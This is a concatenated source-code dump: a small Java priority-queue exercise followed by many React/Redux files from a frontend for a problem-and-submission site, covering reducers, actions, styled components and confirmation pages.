import java.util.PriorityQueue;
import java.util.Queue;
import java.util.Random;
import com.tiago.melo.estruturas.utils.Pessoa;
import com.tiago.melo.estruturas.utils.Utils;
import com.tiago.melo.interfaces.TestaEstrutura;
public class TesteFilaDePrioridades implements TestaEstrutura {
// Utility method to add random data to Queue
private static void adicionaDadosNaFila(Queue<Pessoa> customerPriorityQueue, int tamanho) {
Random rand = new Random();
for (int i = 0; i < tamanho; i++) {
int id = rand.nextInt(100);
customerPriorityQueue.add(new Pessoa(id, "Tiago" + id));
}
}
// Removendo elementos da fila de prioridade
private static void pollDataFromQueue(Queue<Pessoa> customerPriorityQueue) {
while (true) {
Pessoa cust = customerPriorityQueue.poll();
if (cust == null)
break;
System.out.println("Processando Pessoa com ID = " + cust.getId());
}
}
@Override
public void geraEstruturaDefault(int tamanho) {
long start = System.currentTimeMillis();
Queue<Integer> integerPriorityQueue = new PriorityQueue<>(tamanho);
Random rand = new Random();
for (int indice = 0; indice < tamanho; indice++) {
Integer randomInteger = new Integer(rand.nextInt(100));
System.out.println("Adicionando: " + randomInteger);
integerPriorityQueue.add(randomInteger);
}
for (int i = 0; i < tamanho; i++) {
Integer in = integerPriorityQueue.poll();
System.out.println("Processando inteiro:" + in);
}
long finish = System.currentTimeMillis();
System.out.println("Tempo de execução do método geraTabelaHashDefault: " + (finish - start));
Utils.criaLogDeExecucao("Tempo de execução do método geraTabelaHashDefault: " + (finish - start));
}
@Override
public void geraEstruturaCustomizada(int tamanho) {
long start = System.currentTimeMillis();
// Fila de prioridade com comparador
Queue<Pessoa> customerPriorityQueue = new PriorityQueue<>(idComparator);
adicionaDadosNaFila(customerPriorityQueue, tamanho);
pollDataFromQueue(customerPriorityQueue);
long finish = System.currentTimeMillis();
System.out.println("Tempo de execução do método geraTabelaHashDefault: " + (finish - start));
Utils.criaLogDeExecucao("Tempo de execução do método geraTabelaHashDefault: " + (finish - start));
}
// Classe anonima de comparador para fila com classe customizada
public static Comparator<Pessoa> idComparator = new Comparator<Pessoa>() {
@Override
public int compare(Pessoa c1, Pessoa c2) {
return (int) (c1.getId() - c2.getId());
}
};
@Override
public void adicionaTempoDeExecucao() {
// TODO Auto-generated method stub
}
}
<file_sep>package com.tiago.melo.estruturas.utils;
public class Pessoa {
private int id;
private String nome;
public Pessoa(int i, String nome) {
this.id = i;
this.nome = nome;
}
public int getId() {
return id;
}
public String getNaome() {
return nome;
}
@Override
public String toString() {
return "id:" + nome + ": nome: " + nome;
}
}
| 68220c187496c881caa6c71acd7d57942cc5c4fe | [
"Markdown",
"Java"
] | 7 | Java | tiagotele/trabalho_algoritmo | e9b166bbf1b97dc5f7d61bdb0354fb3bb363ce21 | be21628e450bd84706ae9ab398b0514dc81cfdec |
refs/heads/master | <repo_name>koniferous22/npns-prototype-frontend<file_sep>/src/constants/content/profile/personalInformationPage.jsx
export const personalInformationPageConstants = {
REQUEST_FORM_FILLED: "PERSONAL_INFORMATION_PAGE_REQUEST_FORM_FILLED",
CONFIRM_PASSWORD_REQUEST: "PERSONAL_INFORMATION_PAGE_CONFIRM_PASSWORD_REQUEST",
CONFIRM_PASSWORD_FAILED: "PERSONAL_INFORMATION_PAGE_CONFIRM_PASSWORD_FAILED",
CHANGE_EMAIL_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_EMAIL_REQUEST",
CHANGE_EMAIL_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_EMAIL_SUCCESS",
CHANGE_EMAIL_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_EMAIL_FAILED",
CHANGE_PASSWORD_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_PASSWORD_REQUEST",
CHANGE_PASSWORD_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_PASSWORD_SUCCESS",
CHANGE_PASSWORD_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_PASSWORD_FAILED",
CHANGE_USERNAME_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_USERNAME_REQUEST",
CHANGE_USERNAME_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_USERNAME_SUCCESS",
CHANGE_USERNAME_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_USERNAME_FAILED",
CHANGE_NAMES_REQUEST: "PERSONAL_INFORMATION_PAGE_CHANGE_NAMES_REQUEST",
CHANGE_NAMES_SUCCESS: "PERSONAL_INFORMATION_PAGE_CHANGE_NAMES_SUCCESS",
CHANGE_NAMES_FAILED: "PERSONAL_INFORMATION_PAGE_CHANGE_NAMES_FAILED",
RESET: "PERSONAL_INFORMATION_PAGE_RESET"
}
export const personalInformationPageStages = {
SUBMITTING_FORM: 0,
PASSWORD_CONFIRMATION: 1,
COMPLETED: 2
}<file_sep>/src/reducers/content/statistics/scoreboardPage.jsx
import { combineReducers } from 'redux'
import { reducer } from 'redux-form'
import { scoreboardPageConstants } from '../../../constants/content/statistics/scoreboardPage'
const defaultQueueScoreboardState = {
data: [],
activePage: 1,
pageCount: 1,
userFlag: false,
highlight: null
}
const defaultState = {}
function singleScoreboardPageReducer(state=defaultQueueScoreboardState, action) {
switch(action.type) {
case scoreboardPageConstants.LOAD_PAGE_REQUEST:
return {
...state,
activePage: action.activePage,
message: 'Loading...',
messageType: action.messageType,
highlight: null,
userFlag: false
}
case scoreboardPageConstants.LOAD_PAGE_SUCCESS:
return {
...state,
data: action.data,
activePage: action.activePage,
message: '',
messageType: action.messageType,
highlight: null,
userFlag: false
}
case scoreboardPageConstants.LOAD_PAGE_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType,
userFlag: false
}
case scoreboardPageConstants.USER_SEARCH_REQUEST:
return {
...state,
message: 'Loading...',
messageType: action.messageType
}
case scoreboardPageConstants.USER_SEARCH_SUCCESS:
return {
...state,
activePage: action.activePage,
userFlag: true,
message: null,
messageType: action.messageType,
highlight: action.username
}
case scoreboardPageConstants.USER_SEARCH_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType
}
case scoreboardPageConstants.USER_COUNT_REQUEST:
return {
...state,
message: 'Loading...',
messageType: action.messageType
}
case scoreboardPageConstants.USER_COUNT_SUCCESS:
return {
...state,
pageCount: action.pageCount,
}
case scoreboardPageConstants.USER_COUNT_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType
}
default:
return state
}
}
function scoreboardPageReducer(state = defaultState, action) {
if (action.type === scoreboardPageConstants.RESET) {
return defaultState
}
const newState = {...state}
if (action.queue) {
newState[action.queue] = singleScoreboardPageReducer(state[action.queue] || defaultQueueScoreboardState, action)
}
return newState
}
const scoreboardSearchFormReducer = reducer
export default combineReducers({
page: scoreboardPageReducer,
form: scoreboardSearchFormReducer
})
<file_sep>/src/styled-components/problem/ProblemBox.jsx
// IMPORTANT HAVE TO REFACTOR NAMES, CUZ THIS WILL BE CONFUSED WITH PROBELM BOX ON QUEUE PAGE
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedProblemBox = styled.div`
border-radius: 10px;
padding: 10px;
h3 {
margin-top: 0;
}
background-color: rgba(67, 0, 50, 0.7);
`
const TryhardProblemBox = props => <div {...props}/>
const ProblemBox = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBox {...props} />}
tryhard={<TryhardProblemBox {...props} />}
/>
export default ProblemBox<file_sep>/src/styled-components/sidebars/HierarchicalListDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedHierarchicalListDiv = styled.div`
ul {
position: relative;
padding-inline-start: 20px;
}
padding-left: 20px;
`
const TryhardHierarchicalListDiv = props => <div {...props} />
const HierarchicalListDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedHierarchicalListDiv {...props} />}
tryhard={<TryhardHierarchicalListDiv {...props} />}
/>
export default HierarchicalListDiv<file_sep>/src/components/confirm/Registration.jsx
import React from 'react';
import { connect } from 'react-redux'
import { Link } from 'react-router-dom'
import { confirmRegistrationActions } from '../../actions/content/confirm/registration'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.confirm.registration
const mapDispatchToProps = dispatch => ({
confirm: token => dispatch(confirmRegistrationActions.confirm(token))
})
class ConfirmRegistrationPage extends React.Component {
componentDidMount() {
this.props.confirm(this.props.token)
}
render() {
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message}
</BackendMessage>
{this.props.verified && (<p> Continue to <Link to='/login'>Login</Link> </p>)}
</ContentDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ConfirmRegistrationPage)
<file_sep>/src/redux-store.jsx
import { createStore, applyMiddleware } from 'redux';
import thunkMiddleware from 'redux-thunk';
import { createLogger } from 'redux-logger';
import rootReducer from './reducers/root';
import { appConfig } from './appConfig'
const logger = createLogger();
const args = appConfig.enableLogger ? [thunkMiddleware, logger] : [thunkMiddleware]
export const store = createStore(
rootReducer,
applyMiddleware(
...args
)
);
<file_sep>/src/styled-components/sidebars/CollapsedSidebarDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
//float: ${props => props.float || 'left'};
const BuzzfeedCollapsedSidebarDiv = styled.div`
display: flex;
flex-direction: column;
justify-content: center;
${props => props.width && `width: ${props.width};`}
${props => props.grow && 'flex-grow: 1;'}
${props => props.shrink && 'flex-shrink: 1;'}
vertical-align: middle;
padding: 10px;
color: #2d117f;
`
const TryhardCollapsedSidebarDiv = props => <div {...props} grow={undefined} shrink={undefined}/>
const CollapsedSidebarDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedCollapsedSidebarDiv {...props} />}
tryhard={<TryhardCollapsedSidebarDiv {...props} />}
/>
export default CollapsedSidebarDiv<file_sep>/src/components/profile/PersonalInformationPage/ProfileUpdateDispatcher.jsx
import React from 'react'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import { connect } from 'react-redux'
const mapDispatchToProps = (dispatch, ownProps) => {
switch (ownProps.form) {
case 'email':
return {
send: () => dispatch(personalInformationPageActions.submitEmailChange(ownProps.values.email, ownProps.token))
}
case 'password':
return {
send: () => dispatch(personalInformationPageActions.submitPasswordChange(ownProps.user))
}
case 'username':
return {
send: () => dispatch(personalInformationPageActions.submitUsernameChange(ownProps.values.username, ownProps.token))
}
case 'names':
return {
send: () => dispatch(personalInformationPageActions.submitNamesChange(ownProps.values.firstName, ownProps.values.lastName, ownProps.token))
}
default:
return {
send: () => {throw new Error('wut?')}
}
}
}
class ProfileUpdateDispatcher extends React.Component {
componentDidMount() {
this.props.send()
}
render() {
return <div/>
}
}
export default connect(null, mapDispatchToProps)(ProfileUpdateDispatcher)<file_sep>/src/constants/content/confirm/passwordChange.jsx
export const confirmPasswordChangeConstants = {
VERIFY_REQUEST: "VERIFY_PASSWORD_CHANGE_REQUEST",
VERIFY_SUCCESS: "VERIFY_PASSWORD_CHANGE_SUCCESS",
VERIFY_FAILED: "VERIFY_PASSWORD_CHANGE_FAILED",
CONFIRM_REQUEST: "CONFIRM_PASSWORD_CHANGE_REQUEST",
CONFIRM_SUCCESS: "CONFIRM_PASSWORD_CHANGE_SUCCESS",
CONFIRM_FAILED: "CONFIRM_PASSWORD_CHANGE_FAILED",
RESET: "PASSWORD_CHANGE_RESET"
}
export const confirmPasswordChangeStages = {
INVALID_TOKEN: 0,
SUBMITTING_FORM: 1,
COMPLETED: 2
}<file_sep>/src/styled-components/header/Constants.jsx
export const headerStyleConstants = {
HEADER_COLLAPSE_LOGGED_IN_CAPTION: "750px"
}<file_sep>/src/components/queue/SubmitProblemPage.jsx
import React from 'react'
import { connect } from 'react-redux'
import { Link } from "react-router-dom"
import SubmitProblemForm from './SubmitProblemPage/SubmitProblemForm'
import { submitProblemActions } from '../../actions/content/submitProblem'
import { submitProblemStages } from '../../constants/content/submitProblemPage'
import MarkdownRender from '../form/MarkdownRender'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.submitProblem
const mapDispatchToProps = dispatch => ({
reset: () => dispatch(submitProblemActions.reset()),
fetchDropdownValues: () => dispatch(submitProblemActions.fetchDropdownValues())
})
class SubmitProblemPage extends React.Component {
componentDidMount() {
this.props.fetchDropdownValues()
}
componentWillUnmount() {
this.props.reset()
}
render() {
const page = this.props.page
const form = this.props.form.form
switch(page.stage) {
case submitProblemStages.COMPLETED:
return(
<ContentDiv>
<BackendMessage messageType={page.messageType}>
{page.message}
</BackendMessage>
<p>Would you like to check out <Link to={'/problem/' + page.problemId}>your submitted problem</Link> or the <Link to={'/q/' + page.queue}>{page.queue} queue</Link>?</p>
</ContentDiv>
)
case submitProblemStages.SUBMITTING_FORM:
default:
return(
<ContentDiv>
<CenteredDiv>
Submitting new problem
</CenteredDiv>
<SubmitProblemForm defaultQueue={this.props.urlQueue || 'Index'} token={this.props.token} queueOptions={page.queueOptions}/>
<CenteredDiv>
<BackendMessage messageType={page.messageType}>
{page.message}
</BackendMessage>
</CenteredDiv>
{
form && form.values && (
<div>
{(form.values.title || form.values.description) && <p>Preview</p>}
<h3>{form.values.title}</h3>
<MarkdownRender source={form.values.description} />
</div>
)
}
</ContentDiv>
)
}
}
}
export default connect(mapStateToProps, mapDispatchToProps)(SubmitProblemPage)
<file_sep>/src/actions/content/profile/premiumPage.jsx
import { premiumPageConstants } from '../../../constants/content/profile/premiumPage';
function subscribe() {
return {
type: premiumPageConstants.SUBSCRIBE
}
}
function unsubscribe() {
return {
type: premiumPageConstants.UNSUBSCRIBE
}
}
export const premiumPageActions = {
subscribe,
unsubscribe
}
<file_sep>/src/reducers/content/confirm.jsx
import { combineReducers } from 'redux'
import confirmRegistrationReducer from './confirm/registration'
import confirmEmailChangeReducer from './confirm/emailChange'
import confirmUsernameChangeReducer from './confirm/usernameChange'
import confirmPasswordChangeReducer from './confirm/passwordChange'
export default combineReducers({
registration: confirmRegistrationReducer,
emailChange: confirmEmailChangeReducer,
usernameChange: confirmUsernameChangeReducer,
passwordChange: confirmPasswordChangeReducer
})<file_sep>/src/reducers/content/confirm/usernameChange.jsx
import { confirmUsernameChangeConstants } from '../../../constants/content/confirm/usernameChange'
function confirmUsernameChangeReducer(state={}, action) {
switch (action.type) {
case confirmUsernameChangeConstants.REQUEST:
return {
message: "Waiting for server response",
messageType: action.messageType
}
case confirmUsernameChangeConstants.SUCCESS:
return {
message: "Username successfully changed",
messageType: action.messageType,
verified: true
}
case confirmUsernameChangeConstants.FAILED:
return {
message: action.message,
messageType: action.messageType,
verified: state.verified || false
}
default:
return state
}
}
export default confirmUsernameChangeReducer
<file_sep>/src/actions/global.jsx
import { globalConstants } from '../constants/global'
import { appConfig } from '../appConfig'
function hierarchy() {
return dispatch => {
dispatch(request())
fetch(appConfig.backendUrl + "/queue/hierarchy", {
method: 'GET',
headers: {
'Content-Type' : 'application/json'
}
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response;
throw error;
}
}).then(response => {
return response.json()
}).then(response => {
dispatch(success(response.hierarchy))
}
).catch(error => {
dispatch(failed())
})
}
function request() { return { type: globalConstants.HIERARCHY_LOAD_REQUEST}}
function success(hierarchy) { return { type: globalConstants.HIERARCHY_LOAD_SUCCESS, hierarchy} }
function failed() { return { type: globalConstants.HIERARCHY_LOAD_FAILED } }
}
function queues() {
return dispatch => {
dispatch(request())
fetch(appConfig.backendUrl + "/queue/all", {
method: 'GET',
headers: {
'Content-Type' : 'application/json'
}
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response;
throw error;
}
}).then(response => {
return response.json()
}).then(response => {
dispatch(success(response.queues.map(q => q.name)))
}
).catch(error => {
dispatch(failed())
})
}
function request() { return { type: globalConstants.LIN_QUEUES_LOAD_REQUEST}}
function success(queues) { return { type: globalConstants.LIN_QUEUES_LOAD_SUCCESS, queues} }
function failed() { return { type: globalConstants.LIN_QUEUES_LOAD_FAILED } }
}
function setTheme(theme) {
return {
type: globalConstants.SET_THEME,
theme
}
}
function showLinQueues() {
return {
type: globalConstants.LIN_QUEUES_DISPLAY
}
}
function hideLinQueues() {
return {
type: globalConstants.LIN_QUEUES_HIDE
}
}
function showThemes() {
return {
type: globalConstants.THEMES_DISPLAY
}
}
function hideThemes() {
return {
type: globalConstants.THEMES_HIDE
}
}
export const globalActions = {
hierarchy,
queues,
setTheme,
showLinQueues,
hideLinQueues,
showThemes,
hideThemes
}<file_sep>/src/components/statistics/ScoreboardPage/ScoreboardSearchUserForm.jsx
import React from 'react';
import { Field, reduxForm } from 'redux-form'
import { scoreboardPageActions } from '../../../actions/content/statistics/scoreboardPage'
import renderField from '../../form/RenderField'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(scoreboardPageActions.findUser(props.queue, values.identifier, 50))
}
const validate = values => {
const errors = {}
if (!values.identifier) {
errors.identifier = 'Required'
}
return errors
}
const ScoreboardSearchUserForm = props => {
const { handleSubmit } = props;
return (
<form onSubmit={handleSubmit}>
<div>
<Field name="identifier" component={renderField} type="text" label='Search User' placeholder='Username or email'/>
</div>
<Button type="submit">Search</Button>
</form>
)
}
export default reduxForm({
form: 'form',
validate,
asyncValidate: (values, dispatch, props, blurredField) => {
if (blurredField === 'identifier') {
return scoreboardPageActions.validateUserExists(values.identifier)
}
return new Promise((resolve,reject) => {})
// LEBO PROMISE VYZADUJE CALLBACK, SIGNED: DR. YANDREY
},
asyncBlurFields: ['identifier'],
onSubmit: submit,
getFormState: ({content}) => content.statistics.scoreboard.form
})(ScoreboardSearchUserForm)
<file_sep>/src/actions/content/problemPage.jsx
import { appConfig } from '../../appConfig'
import { problemPageConstants } from '../../constants/content/problemPage'
import { messageType } from '../../constants/misc/backendMessageTypes'
function loadProblemData(problemId) {
const request = () => ({ type: problemPageConstants.LOAD_PROBLEM_DATA_REQUEST })
const success = (problem) => ({type: problemPageConstants.LOAD_PROBLEM_DATA_SUCCESS, problem})
const failure = (message) => ({type: problemPageConstants.LOAD_PROBLEM_DATA_FAILED, message, messageType: messageType.ERROR})
if (!problemId) {
return failure('No Problem specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/problem/" + problemId
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function loadSubmissionPage(problemId, activePage) {
const request = () => ({ type: problemPageConstants.LOAD_SUBMISSION_PAGE_REQUEST, problemId })
const success = (data, hasMore) => ({ type: problemPageConstants.LOAD_SUBMISSION_PAGE_SUCCESS, activePage, data, hasMore })
const failure = (message) => ({type: problemPageConstants.LOAD_SUBMISSION_PAGE_FAILED, message, messageType: messageType.ERROR})
if (!problemId) {
return failure('No Problem specified')
}
return dispatch => {
dispatch(request())
var requestUrl = appConfig.backendUrl + "/problem/" + problemId + "/submissions"
requestUrl += (activePage && activePage > 0) ? "?page=" + activePage : ""
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body.data, body.hasMore))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function loadReplyPage(submissionId, activePage) {
const request = () => ({ type: problemPageConstants.LOAD_REPLY_PAGE_REQUEST })
const success = (submission, activeReplyPage, data, hasMore) => ({ type: problemPageConstants.LOAD_REPLY_PAGE_SUCCESS, submission, activeReplyPage, data, hasMore })
const failure = (message) => ({type: problemPageConstants.LOAD_REPLY_PAGE_FAILED, message, messageType: messageType.ERROR})
if (!submissionId) {
return failure('No submission specified')
}
return dispatch => {
dispatch(request())
var requestUrl = appConfig.backendUrl + "/submission/" + submissionId + "/replies"
requestUrl += (activePage && activePage > 0) ? "?page=" + activePage : ""
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(submissionId, activePage, body.data, body.hasMore))
}).catch(error => {
dispatch(failure(error))
})
}
}
function postSubmission(submission, token) {
const request = () => ({ type: problemPageConstants.POST_SUBMISSION_REQUEST })
const success = (submission) => ({type: problemPageConstants.POST_SUBMISSION_SUCCESS, submission})
const failure = (message) => ({type: problemPageConstants.POST_SUBMISSION_FAILED, message, messageType: messageType.ERROR})
if (!submission) {
return failure('No submission specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/problem/" + submission.problem + "/submit"
fetch(requestUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token },
body: JSON.stringify(submission)
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body))
}).catch(error => {
dispatch(failure(error))
})
}
}
function replySubmission(reply, token) {
const request = () => ({ type: problemPageConstants.REPLY_SUBMISSION_REQUEST })
const success = (submission, reply) => ({ type: problemPageConstants.REPLY_SUBMISSION_SUCCESS, submission, reply })
const failure = (message) => ({type: problemPageConstants.REPLY_SUBMISSION_FAILED, message, messageType: messageType.ERROR})
if (!reply) {
return failure('No reply specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/submission/" + reply.submission + "/reply"
fetch(requestUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token },
body: JSON.stringify(reply)
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body.submission, body))
}).catch(error => {
dispatch(failure(error))
})
}
}
function acceptSubmission(submission, problem, token) {
const request = () => ({ type: problemPageConstants.ACCEPT_SUBMISSION_REQUEST })
const success = () => ({ type: problemPageConstants.ACCEPT_SUBMISSION_SUCCESS, submission })
const failure = (message) => ({type: problemPageConstants.ACCEPT_SUBMISSION_FAILED, message, messageType: messageType.ERROR})
if (!submission) {
return failure('No submission specified')
}
if (!problem) {
return failure('No problem specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/problem/" + problem + "/mark_solved"
fetch(requestUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token },
body: JSON.stringify({
submission
})
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success())
}).catch(error => {
dispatch(failure(error))
})
}
}
function selectReplyForm(submission) {
return {
type: problemPageConstants.SELECT_REPLY_FORM,
reply: submission
}
}
function hideReplies(submission) {
return {
type: problemPageConstants.HIDE_REPLIES,
submission
}
}
function reset() {
return {
type: problemPageConstants.RESET
}
}
export const problemPageActions = {
loadProblemData,
loadSubmissionPage,
loadReplyPage,
postSubmission,
replySubmission,
acceptSubmission,
selectReplyForm,
hideReplies,
reset
}
<file_sep>/src/components/confirm/UsernameChange.jsx
import React from 'react';
import { connect } from 'react-redux'
import { Link } from 'react-router-dom'
import { confirmUsernameChangeActions } from '../../actions/content/confirm/usernameChange'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.confirm.usernameChange
const mapDispatchToProps = dispatch => ({
confirm: (confirmationToken) => dispatch(confirmUsernameChangeActions.confirm(confirmationToken))
})
class ConfirmUsernameChangePage extends React.Component {
componentDidMount() {
this.props.confirm(this.props.token)
}
render() {
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message && <p>{this.props.message}</p>}
</BackendMessage>
{this.props.verified && (<p> Continue to <Link to='/login'>Login</Link> </p>)}
</ContentDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ConfirmUsernameChangePage)
<file_sep>/src/constants/content/boost.jsx
export const boostConstants = {
REQUEST: 'BOOST_PAGE_BOOST_REQUEST',
SUCCESS: 'BOOST_PAGE_BOOST_SUCCESS',
FAILED: 'BOOST_PAGE_BOOST_FAILED',
RESET: 'BOOST_PAGE_RESET'
}
export const boostStages = {
BOOSTING: 0,
COMPLETED: 1
}
<file_sep>/src/reducers/content/profile/profilePage.jsx
import { profilePageConstants } from '../../../constants/content/profile/profilePage'
const defaultState = {
data: {
firstName: "",
lastName: "",
email: "",
problem_count: 0,
submission_count: 0,
reply_count: 0,
balances: {}
}
}
function profilePageReducer(state=defaultState, action) {
switch(action.type) {
case profilePageConstants.LOAD_USER_REQUEST:
return {...state, message: "Loading data", messageType: action.messageType}
case profilePageConstants.LOAD_USER_SUCCESS:
return {data: action.user || defaultState.data}
case profilePageConstants.LOAD_USER_FAILED:
return {...state, message: "No user found", messageType: action.messageType}
default:
return state
}
}
export default profilePageReducer
<file_sep>/src/components/form/RenderTextArea.jsx
import React from 'react'
import TextAreaDiv from '../../styled-components/form/TextAreaDiv'
const renderTextArea = ({
input,
label,
type,
placeholder,
rows,
cols,
center,
meta: {touched, error}
}) => (
<TextAreaDiv center={center}>
<textarea {...input} placeholder={placeholder || label} rows={rows} cols={cols}/>
{touched && error && <span>{error}</span>}
</TextAreaDiv>
)
export default renderTextArea
<file_sep>/src/styled-components/sidebars/QueueDropdown.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedQueueDropdown = styled.div`
margin: 0px 10px 0px 10px;
font-family: Helvetica, Arial, Sans-Serif;
background-color: #110042;
padding:6px;
border-radius:5px;
font-weight:bold;
color:white;
:hover {
text-decoration: underline;
cursor: pointer;
}
`
const TryhardQueueDropdown = props => <div {...props} />
const QueueDropdown = props => <ThemeSelector
buzzfeed={<BuzzfeedQueueDropdown {...props} />}
tryhard={<TryhardQueueDropdown {...props} />}
/>
export default QueueDropdown<file_sep>/src/reducers/content/profile/personalInformationPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { personalInformationPageStages, personalInformationPageConstants } from '../../../constants/content/profile/personalInformationPage'
const defaultState = {
stage: personalInformationPageStages.SUBMITTING_FORM
}
const defaultPwdConfirmationState = {
stage: personalInformationPageStages.PASSWORD_CONFIRMATION,
message:'Please confirm by entering your current password'
}
const defaultCompletionState = {
stage: personalInformationPageStages.COMPLETED,
message: "Waiting for server confirmation"
}
function personalInformationPageReducer(state=defaultState, action) {
switch (action.type) {
case personalInformationPageConstants.REQUEST_FORM_FILLED:
return (['email','username','password','names'].includes(action.form)) ? {
...defaultPwdConfirmationState,
form: action.form,
values: action.values
} : {
stage: personalInformationPageStages.SUBMITTING_FORM,
message: 'lol rly unexpected error xD'
}
case personalInformationPageConstants.CONFIRM_PASSWORD_REQUEST:
return {
stage: personalInformationPageStages.PASSWORD_CONFIRMATION,
message: "Waiting for server response",
form: state.form,
values: state.values
}
case personalInformationPageConstants.CONFIRM_PASSWORD_FAILED:
return {
stage: personalInformationPageStages.SUBMITTING_FORM,
message: "Password confirmation failed"
}
case personalInformationPageConstants.CHANGE_EMAIL_REQUEST:
return {
...defaultCompletionState,
form: 'email',
values: state.values
}
case personalInformationPageConstants.CHANGE_USERNAME_REQUEST:
return {
...defaultCompletionState,
form: 'username',
values: state.values
}
case personalInformationPageConstants.CHANGE_PASSWORD_REQUEST:
return {
...defaultCompletionState,
form: 'password',
values: state.values
}
case personalInformationPageConstants.CHANGE_NAMES_REQUEST:
return {
...defaultCompletionState,
form: 'names',
values: state.values
}
case personalInformationPageConstants.CHANGE_EMAIL_SUCCESS:
return {
...defaultCompletionState,
message: 'Changes submitted, check your NEW email box',
form: 'email',
values: state.values
}
case personalInformationPageConstants.CHANGE_USERNAME_SUCCESS:
return {
...defaultCompletionState,
message: 'Changes submitted, check your email box',
form: 'username',
values: state.values
}
case personalInformationPageConstants.CHANGE_PASSWORD_SUCCESS:
return {
...defaultCompletionState,
message: 'Changes submitted, check your email box',
form: 'password',
values: state.values
}
case personalInformationPageConstants.CHANGE_NAMES_SUCCESS:
return {
...defaultCompletionState,
message: 'Name of the user changed',
form: 'names',
values: state.values
}
case personalInformationPageConstants.CHANGE_EMAIL_FAILED:
case personalInformationPageConstants.CHANGE_USERNAME_FAILED:
case personalInformationPageConstants.CHANGE_PASSWORD_FAILED:
case personalInformationPageConstants.CHANGE_NAMES_FAILED:
return {
stage: personalInformationPageStages.SUBMITTING_FORM,
message: action.message
}
case personalInformationPageConstants.RESET:
return defaultState
default:
return state
}
}
const personalInformationFormReducer = reducer
export default combineReducers({
page: personalInformationPageReducer,
form: personalInformationFormReducer
})<file_sep>/src/components/problem/ProblemPage/PostSubmissionForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import { problemPageActions } from '../../../actions/content/problemPage'
import MyEditor from '../../form/MyEditor'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(problemPageActions.postSubmission({content: values.content, problem: props.problem}, props.token))
}
let PostSubmissionForm = props => {
const { handleSubmit } = props;
return (
<form onSubmit={handleSubmit}>
<div>
<h4>Post your submission here!</h4>
<Field name="content" component={MyEditor} />
</div>
<Button type="submit">Submit</Button>
</form>
)
}
